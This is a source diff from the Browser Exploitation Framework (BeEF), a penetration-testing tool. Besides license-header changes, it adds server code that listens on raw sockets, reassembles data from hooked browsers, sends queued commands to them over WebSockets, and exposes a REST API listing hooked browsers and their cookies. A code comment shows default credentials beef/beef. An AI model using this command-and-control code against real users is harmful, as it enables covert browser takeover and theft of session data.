+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/models/optioncache.rb
+++ b/core/main/models/optioncache.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/models/result.rb
+++ b/core/main/models/result.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/models/user.rb
+++ b/core/main/models/user.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/network_stack/api.rb
+++ b/core/main/network_stack/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -29,6 +19,7 @@ module Handlers
    # Starts the AssetHandler instance
    def initialize
      @allocations = {}
+      @sockets = {}
      @http_server = BeEF::Core::Server.instance
      @root_dir = File.expand_path('../../../../', __FILE__)
    end
@@ -56,6 +47,61 @@ module Handlers
        @allocations.delete(url)
        @http_server.unmount(url)
        @http_server.remap
+        print_info "Url [" + url + "] unmounted"
+    end
+
+    # use it like: bind_socket("irc","0.0.0.0",6667)
+    def bind_socket(name, host, port)
+      if @sockets[name] != nil
+        print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]."
+      else
+        t = Thread.new {
+          server = TCPServer.new(host,port)
+          loop do
+            Thread.start(server.accept) do |client|
+              data = ""
+              recv_length = 1024
+              threshold = 1024 * 512
+              while (tmp = client.recv(recv_length))
+                data += tmp
+                break if tmp.length < recv_length || tmp.length == recv_length
+                # 512 KB max of incoming data
+                break if data > threshold
+              end
+              if  data.size > threshold
+                print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved."
+              else
+                @sockets[name] = {'thread' => t, 'data' => data}
+                print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data."
+                print_debug "Bind Socket [#{name}] received:\n#{data}"
+              end
+              client.close
+            end
+          end
+        }
+        print_info "Bind socket [#{name}] listening on [#{host}:#{port}]."
+      end
+    end
+
+    def get_socket_data(name)
+      data = nil
+      if @sockets[name] != nil
+        data = @sockets[name]['data']
+      else
+        print_error "Bind Socket [#{name}] does not exists."
+      end
+      data
+    end
+
+    def unbind_socket(name)
+        t = @sockets[name]['thread']
+        if t.alive?
+          print_debug "Thread to be killed: #{t}"
+          Thread.kill(t)
+          print_info "Bind Socket [#{name}] killed."
+        else
+          print_info "Bind Socket [#{name}] ALREADY killed."
+        end
    end

    # Builds a URL based on the path and extension, if neither are passed a random URL will be generated
--- a/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -1,161 +1,121 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module NetworkStack
-module Handlers
-  
-  # @note DynamicHandler is used reconstruct segmented traffic from the hooked browser
-  class DynamicReconstruction
+  module Core
+    module NetworkStack
+      module Handlers

-    # @note holds packet queue
-    PQ = Array.new() 
+        # @note DynamicHandler is used reconstruct segmented traffic from the hooked browser
+        class DynamicReconstruction < BeEF::Core::Router::Router

-    # @note obtain dynamic mount points from HttpHookServer
-    MOUNTS = BeEF::Core::Server.instance.mounts
+          # @note holds packet queue
+          PQ = Array.new()

-    # Combines packet information and pushes to PQ (packet queue), then checks packets
-    def call(env)
-        @request = Rack::Request.new(env)
+          # @note obtain dynamic mount points from HttpHookServer
+          MOUNTS = BeEF::Core::Server.instance.mounts

-        # skip packet checking if the request method is HEAD, PUT, DELETE or if parameters == null
-        if not self.is_valid_req(@request)
-            response = Rack::Response.new(
-                   body = [],
-                   status = 404,
-                   header = {
-                     'Pragma' => 'no-cache',
-                     'Cache-Control' => 'no-cache',
-                     'Expires' => '0'
-                   }
-               )
-            return response
-        end
+          before do
+            error 404 unless !params.empty?
+            headers 'Pragma' => 'no-cache',
+                    'Cache-Control' => 'no-cache',
+                    'Expires' => '0'
+          end

-        response = Rack::Response.new(
-            body = [],
-            status = 200,
-            header = {
-              'Pragma' => 'no-cache',
-              'Cache-Control' => 'no-cache',
-              'Expires' => '0',
-              'Content-Type' => 'text/javascript',
-              'Access-Control-Allow-Origin' => '*',
-              'Access-Control-Allow-Methods' => 'POST'
+          # Combines packet information and pushes to PQ (packet queue), then checks packets
+          get '/' do
+            headers 'Pragma' => 'no-cache',
+                    'Cache-Control' => 'no-cache',
+                    'Expires' => '0',
+                    'Content-Type' => 'text/javascript',
+                    'Access-Control-Allow-Origin' => '*',
+                    'Access-Control-Allow-Methods' => 'POST, GET'
+
+            PQ << {
+                :beefhook => params[:bh],
+                :stream_id => Integer(params[:sid]),
+                :packet_id => Integer(params[:pid]),
+                :packet_count => Integer(params[:pc]),
+                :data => params[:d]
            }
-        )

-        PQ << {
-            :beefhook =>  @request['bh'],
-            :stream_id => Integer(@request['sid']),
-            :packet_id => Integer(@request['pid']),
-            :packet_count => Integer(@request['pc']),
-            :data => @request['d']
-        }
+            Thread.new {
+              check_packets()
+            }
+          end

-        # @todo Test under high load, possibly limit the amount of threads being created
-        Thread.new {
-           check_packets()
-        }
-        response
-    end
-
-    # Check packets goes through the PQ array and attempts to reconstruct the stream from multiple packets
-    def check_packets()
-        checked = Array.new()
-        PQ.each do |packet| 
-            if (checked.include?(packet[:beefhook]+':'+String(packet[:stream_id])))
+          # Check packets goes through the PQ array and attempts to reconstruct the stream from multiple packets
+          def check_packets()
+            checked = Array.new()
+            PQ.each do |packet|
+              if (checked.include?(packet[:beefhook]+':'+String(packet[:stream_id])))
                next
-            end
-            checked << packet[:beefhook]+':'+String(packet[:stream_id])
-            pc = 0
-            PQ.each do |p| 
+              end
+              checked << packet[:beefhook]+':'+String(packet[:stream_id])
+              pc = 0
+              PQ.each do |p|
                if (packet[:beefhook] == p[:beefhook] and packet[:stream_id] == p[:stream_id])
-                    pc += 1
+                  pc += 1
                end
-            end
-            if (packet[:packet_count] == pc)
+              end
+              if (packet[:packet_count] == pc)
                packets = expunge(packet[:beefhook], packet[:stream_id])
                data = ''
-                packets.each_with_index do |sp,i|
-                    if (packet[:beefhook] == sp[:beefhook] and packet[:stream_id] == sp[:stream_id])
-                        data += sp[:data]
-                    end
+                packets.each_with_index do |sp, i|
+                  if (packet[:beefhook] == sp[:beefhook] and packet[:stream_id] == sp[:stream_id])
+                    data += sp[:data]
+                  end
                end
-                b64 = Base64.decode64(data) 
+                b64 = Base64.decode64(data)
                begin
-                    res = JSON.parse(b64).first
-                    res['beefhook'] = packet[:beefhook]
-                    res['request'] = @request
-                    res['beefsession'] = @request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
-                    execute(res)
+                  res = JSON.parse(b64).first
+                  res['beefhook'] = packet[:beefhook]
+                  res['request'] = request
+                  res['beefsession'] = request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
+                  execute(res)
                rescue JSON::ParserError => e
-                    print_debug 'Network stack could not decode packet stream.'
-                    print_debug 'Dumping Stream Data [base64]: '+data
-                    print_debug 'Dumping Stream Data: '+b64
+                  print_debug 'Network stack could not decode packet stream.'
+                  print_debug 'Dumping Stream Data [base64]: '+data
+                  print_debug 'Dumping Stream Data: '+b64
                end
+              end
            end
-       end
-    end
+          end

-    # Delete packets that have been reconstructed, return deleted packets
-    # @param [String] beefhook Beefhook of hooked browser
-    # @param [Integer] stream_id The stream ID
-    def expunge(beefhook, stream_id)
-        packets = PQ.select{ |p| p[:beefhook] == beefhook and p[:stream_id] == stream_id }
-        PQ.delete_if { |p| p[:beefhook] == beefhook and p[:stream_id] == stream_id }
-        packets.sort_by { |p| p[:packet_id] }
-    end
+          # Delete packets that have been reconstructed, return deleted packets
+          # @param [String] beefhook Beefhook of hooked browser
+          # @param [Integer] stream_id The stream ID
+          def expunge(beefhook, stream_id)
+            packets = PQ.select { |p| p[:beefhook] == beefhook and p[:stream_id] == stream_id }
+            PQ.delete_if { |p| p[:beefhook] == beefhook and p[:stream_id] == stream_id }
+            packets.sort_by { |p| p[:packet_id] }
+          end

-    # Execute is called once a stream has been rebuilt. it searches the mounts and passes the data to the correct handler
-    # @param [Hash] data Hash of data that has been rebuilt by the dynamic reconstruction
-    def execute(data)
-        handler = get_param(data, 'handler')
-        if (MOUNTS.has_key?(handler))
-            if (MOUNTS[handler].class == Array and MOUNTS[handler].length == 2)
+          # Execute is called once a stream has been rebuilt. it searches the mounts and passes the data to the correct handler
+          # @param [Hash] data Hash of data that has been rebuilt by the dynamic reconstruction
+          def execute(data)
+            handler = get_param(data, 'handler')
+            if (MOUNTS.has_key?(handler))
+              if (MOUNTS[handler].class == Array and MOUNTS[handler].length == 2)
                MOUNTS[handler][0].new(data, MOUNTS[handler][1])
-            else 
+              else
                MOUNTS[handler].new(data)
+              end
            end
-        end
-    end
+          end

-    # 1. check methods HEAD, PUT, DELETE. return 404 if these methods are called
-    # 2. check for parameters = null (no parameters). return 404 in this case
-    # @param [Hash] request the Rack HTTP Request.
-    def is_valid_req(request)
-      is_valid = true
-      if request.put? or request.delete? or request.head? or request.params.empty?
-         is_valid = false
+          # Assist function for getting parameter from hash
+          # @param [Hash] query Hash to pull key from
+          # @param [String] key The key association to return from `query`
+          # @return Value associated with `key`
+          def get_param(query, key)
+            return nil if query[key].nil?
+            query[key]
+          end
+        end
      end
-      is_valid
    end
-    
-    # Assist function for getting parameter from hash
-    # @param [Hash] query Hash to pull key from
-    # @param [String] key The key association to return from `query`
-    # @return Value associated with `key`
-    def get_param(query, key)
-      return nil if query[key].nil?
-      query[key]
-    end
-    
  end
-  
-end
-end
-end
 end
--- a/core/main/network_stack/websocket/websocket.rb
+++ b/core/main/network_stack/websocket/websocket.rb
@@ -0,0 +1,262 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module Websocket
+      require 'singleton'
+      require 'json'
+      require 'base64'
+      require 'em-websocket'
+      class Websocket
+        include Singleton
+        include BeEF::Core::Handlers::Modules::Command
+
+        @@activeSocket= Hash.new
+        @@lastalive= Hash.new
+        @@config = BeEF::Core::Configuration.instance
+        #@@wsopt=nil
+        MOUNTS = BeEF::Core::Server.instance.mounts
+
+        def initialize
+
+
+          secure = @@config.get("beef.http.websocket.secure")
+          @root_dir = File.expand_path('../../../../../', __FILE__)
+
+          if (secure)
+            ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true,
+                     :tls_options => {
+                         :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
+                         :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
+                     }
+            }
+            # @note Start a WSS server socket
+            start_websocket_server(ws_secure_options, true)
+          end
+
+          # @note Start a WS server socket
+          ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")}
+          start_websocket_server(ws_options,false)
+
+          #  #Thread for websocket-secure
+          #  Thread.new {
+          #    port = @@config.get("beef.http.websocket.secure_port")
+          #    sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+          #    EventMachine.run {
+          #
+          #      wsopt = {:host => "0.0.0.0", :port => port, :secure => true,
+          #               :tls_options => {
+          #                   :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
+          #                   :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
+          #               }
+          #      }
+          #
+          #
+          #      EventMachine::WebSocket.start(wsopt) do |ws|
+          #        begin
+          #          print_debug "New WebSocket-secured channel open."
+          #          ws.onmessage { |msg|
+          #            msg_hash = JSON.parse("#{msg}")
+          #            #@note messageHash[result] is Base64 encoded
+          #            if (msg_hash["cookie"]!= nil)
+          #              print_debug("WebSocket-secured - Browser says helo! WebSocket is running")
+          #              #insert new connection in activesocket
+          #              @@activeSocket["#{msg_hash["cookie"]}"] = ws
+          #              print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]")
+          #            elsif msg_hash["alive"] != nil
+          #              hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+          #              unless hooked_browser.nil?
+          #                hooked_browser.lastseen = Time.new.to_i
+          #                hooked_browser.count!
+          #                hooked_browser.save
+          #
+          #                #Check if new modules need to be sent
+          #                zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+          #                zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+          #
+          #                #@todo antisnatchor:
+          #                #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+          #                #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+          #                dhook = BeEF::Extension::Requester::API::Hook.new
+          #                dhook.requester_run(hooked_browser, '')
+          #
+          #                #Check if new XssRays scan need to be started
+          #                xssrays = BeEF::Extension::Xssrays::API::Scan.new
+          #                xssrays.start_scan(hooked_browser, '')
+          #              end
+          #            else
+          #              #json recv is a cmd response decode and send all to
+          #              #we have to call dynamicreconstructor handler camp must be websocket
+          #              #print_debug("Received from WebSocket #{messageHash}")
+          #              execute(msg_hash)
+          #            end
+          #          }
+          #        rescue Exception => e
+          #          print_error "WebSocket-secured error: #{e}"
+          #        end
+          #      end
+          #    }
+          #
+          #  }
+          #
+          ##Thread for websocket
+          #Thread.new {
+          #  port = @@config.get("beef.http.websocket.port")
+          #  sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+          #  EventMachine.run {
+          #
+          #    wsopt = {:host => "0.0.0.0", :port => port}
+          #
+          #
+          #    EventMachine::WebSocket.start(wsopt) do |ws|
+          #      begin
+          #        print_debug "New WebSocket channel open."
+          #        ws.onmessage { |msg|
+          #          msg_hash = JSON.parse("#{msg}")
+          #          #@note messageHash[result] is Base64 encoded
+          #          if (msg_hash["cookie"]!= nil)
+          #            print_debug("WebSocket - Browser says helo! WebSocket is running")
+          #            #insert new connection in activesocket
+          #            @@activeSocket["#{msg_hash["cookie"]}"] = ws
+          #            print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
+          #          elsif msg_hash["alive"] != nil
+          #            hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+          #            unless hooked_browser.nil?
+          #              hooked_browser.lastseen = Time.new.to_i
+          #              hooked_browser.count!
+          #              hooked_browser.save
+          #
+          #              #Check if new modules need to be sent
+          #              zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+          #              zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+          #
+          #              #@todo antisnatchor:
+          #              #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+          #              #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+          #              dhook = BeEF::Extension::Requester::API::Hook.new
+          #              dhook.requester_run(hooked_browser, '')
+          #
+          #              #Check if new XssRays scan need to be started
+          #              xssrays = BeEF::Extension::Xssrays::API::Scan.new
+          #              xssrays.start_scan(hooked_browser, '')
+          #            end
+          #          else
+          #            #json recv is a cmd response decode and send all to
+          #            #we have to call dynamicreconstructor handler camp must be websocket
+          #            #print_debug("Received from WebSocket #{messageHash}")
+          #            execute(msg_hash)
+          #          end
+          #        }
+          #      rescue Exception => e
+          #        print_error "WebSocket error: #{e}"
+          #      end
+          #    end
+          #  }
+          #}
+
+
+        end
+
+        def start_websocket_server(ws_options, secure)
+          Thread.new {
+            sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
+            EventMachine.run {
+              EventMachine::WebSocket.start(ws_options) do |ws|
+                begin
+                  secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
+                  ws.onmessage { |msg|
+                    msg_hash = JSON.parse("#{msg}")
+                    #@note messageHash[result] is Base64 encoded
+                    if (msg_hash["cookie"]!= nil)
+                      print_debug("WebSocket - Browser says helo! WebSocket is running")
+                      #insert new connection in activesocket
+                      @@activeSocket["#{msg_hash["cookie"]}"] = ws
+                      print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
+                    elsif msg_hash["alive"] != nil
+                      hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
+                      unless hooked_browser.nil?
+                        hooked_browser.lastseen = Time.new.to_i
+                        hooked_browser.count!
+                        hooked_browser.save
+
+                        #Check if new modules need to be sent
+                        zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
+                        zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
+
+                        #@todo antisnatchor:
+                        #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
+                        #Check if new forged requests need to be sent (Requester/TunnelingProxy)
+                        dhook = BeEF::Extension::Requester::API::Hook.new
+                        dhook.requester_run(hooked_browser, '')
+
+                        #Check if new XssRays scan need to be started
+                        xssrays = BeEF::Extension::Xssrays::API::Scan.new
+                        xssrays.start_scan(hooked_browser, '')
+                      end
+                    else
+                      #json recv is a cmd response decode and send all to
+                      #we have to call dynamicreconstructor handler camp must be websocket
+                      #print_debug("Received from WebSocket #{messageHash}")
+                      execute(msg_hash)
+                    end
+                  }
+                rescue Exception => e
+                  print_error "WebSocket error: #{e}"
+                end
+              end
+            }
+          }
+        end
+
+        #@note retrieve the right websocket channel given an hooked browser session
+        #@param [String] session the hooked browser session
+        def getsocket (session)
+          if (@@activeSocket[session] != nil)
+            true
+          else
+            false
+          end
+        end
+
+        #@note send a function to hooked and ws browser
+        #@param [String] fn the module to execute
+        #@param [String] session the hooked browser session
+        def send (fn, session)
+          @@activeSocket[session].send(fn)
+        end
+
+        BeEF::Core::Handlers::Commands
+        #call the handler for websocket cmd response
+        #@param [Hash] data contains the answer of a command
+        def execute (data)
+          command_results=Hash.new
+          command_results["data"]=Base64.decode64(data["result"])
+          command_results["data"].force_encoding('UTF-8')
+          hooked_browser = data["bh"]
+          (print_error "BeEFhook is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(hooked_browser)
+          (print_error "command_id is invalid"; return) if not BeEF::Filters.is_valid_command_id?(data["cid"])
+          (print_error "command name is empty"; return) if data["handler"].empty?
+          (print_error "command results are empty"; return) if command_results.empty?
+          handler = data["handler"]
+          if handler.match(/command/)
+            BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"],
+                                                    @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
+          else #processing results from extensions, call the right handler
+            data["beefhook"] = hooked_browser
+            data["results"] = JSON.parse(Base64.decode64(data["result"]))
+            if MOUNTS.has_key?(handler)
+              if MOUNTS[handler].class == Array and MOUNTS[handler].length == 2
+                MOUNTS[handler][0].new(data, MOUNTS[handler][1])
+              else
+                MOUNTS[handler].new(data)
+              end
+            end
+          end
+        end
+      end
+    end
+  end
+end
--- a/core/main/rest/api.rb
+++ b/core/main/rest/api.rb
@@ -0,0 +1,62 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module Rest
+
+      module RegisterHooksHandler
+        def self.mount_handler(server)
+          server.mount('/api/hooks', BeEF::Core::Rest::HookedBrowsers.new)
+        end
+      end
+
+      module RegisterModulesHandler
+        def self.mount_handler(server)
+          server.mount('/api/modules', BeEF::Core::Rest::Modules.new)
+        end
+      end
+
+      module RegisterCategoriesHandler
+        def self.mount_handler(server)
+          server.mount('/api/categories', BeEF::Core::Rest::Categories.new)
+        end
+      end
+
+      module RegisterLogsHandler
+        def self.mount_handler(server)
+          server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
+        end
+      end
+
+      module RegisterAdminHandler
+        def self.mount_handler(server)
+          server.mount('/api/admin', BeEF::Core::Rest::Admin.new)
+        end
+      end
+
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
+
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
+
+      #
+      # Check the source IP is within the permitted subnet
+      # This is from extensions/admin_ui/controllers/authentication/authentication.rb
+      #
+      def self.permitted_source?(ip)
+        # get permitted subnet 
+        permitted_ui_subnet = BeEF::Core::Configuration.instance.get("beef.restrictions.permitted_ui_subnet")
+        target_network = IPAddr.new(permitted_ui_subnet)
+        
+        # test if ip within subnet
+        return target_network.include?(ip)
+      end
+
+    end
+  end
+end
--- a/core/main/rest/handlers/admin.rb
+++ b/core/main/rest/handlers/admin.rb
@@ -0,0 +1,65 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Admin < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+
+        before do
+          # error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        # @note Authenticate using the config set username/password to retrieve the "token" used for subsquent calls.
+        # Return the secret token used for subsquene tAPI calls.
+        #
+        # Input must be specified in JSON format
+        #
+        # +++ Example: +++
+        #POST /api/admin/login HTTP/1.1
+        #Host: 127.0.0.1:3000
+        #Content-Type: application/json; charset=UTF-8
+        #Content-Length: 18
+        #
+        #{"username":"beef", "password":"beef"}
+        #===response (snip)===
+        #HTTP/1.1 200 OK
+        #Content-Type: application/json; charset=UTF-8
+        #Content-Length: 35
+        #
+        #{"success":"true","token":"122323121"}
+        #
+        post '/login' do
+          request.body.rewind
+          begin
+            data = JSON.parse request.body.read
+            # check username and password
+            if not (data['username'].eql? config.get('beef.credentials.user') and data['password'].eql? config.get('beef.credentials.passwd') )
+              BeEF::Core::Logger.instance.register('Authentication', "User with ip #{request.ip} has failed to authenticate in the application.")
+              halt 401
+            else
+              { "success" => true,
+                "token" => "#{config.get('beef.api_token')}"
+              }.to_json
+            end
+          rescue Exception => e
+            error 400
+          end
+        end
+
+        private
+
+      end
+    end
+  end
+end
--- a/core/main/rest/handlers/categories.rb
+++ b/core/main/rest/handlers/categories.rb
@@ -0,0 +1,39 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Categories < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        get '/' do
+           categories = BeEF::Modules::get_categories
+           cats = Array.new
+           i = 0
+           # todo add sub-categories support!
+           categories.each do |category|
+             cat = {"id" => i, "name" => category}
+             cats << cat
+             i += 1
+           end
+           cats.to_json
+        end
+
+      end
+    end
+  end
+end
--- a/core/main/rest/handlers/hookedbrowsers.rb
+++ b/core/main/rest/handlers/hookedbrowsers.rb
@@ -0,0 +1,91 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+  module Core
+    module Rest
+      class HookedBrowsers < BeEF::Core::Router::Router
+
+        config = BeEF::Core::Configuration.instance
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        #
+        # @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/
+        #
+        #get "/to/a/pub"
+        #  "BeER please"
+        #end
+
+        #
+        # @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
+        #
+        get '/' do
+          online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
+          offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
+
+          output = {
+              'hooked-browsers' => {
+                  'online' => online_hooks,
+                  'offline' => offline_hooks
+              }
+          }
+          output.to_json
+        end
+
+        #
+        # @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
+        #
+        get '/:session' do
+          hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
+          error 401 unless hb != nil
+
+          details = BeEF::Core::Models::BrowserDetails.all(:session_id => hb.session)
+          result = {}
+          details.each do |property|
+            result[property.detail_key] = property.detail_value
+          end
+          result.to_json
+        end
+
+        def hb_to_json(hbs)
+          hbs_hash = {}
+          i = 0
+          hbs.each do |hb|
+            hbs_hash[i] = (get_hb_details(hb))
+            i+=1
+          end
+          hbs_hash
+        end
+
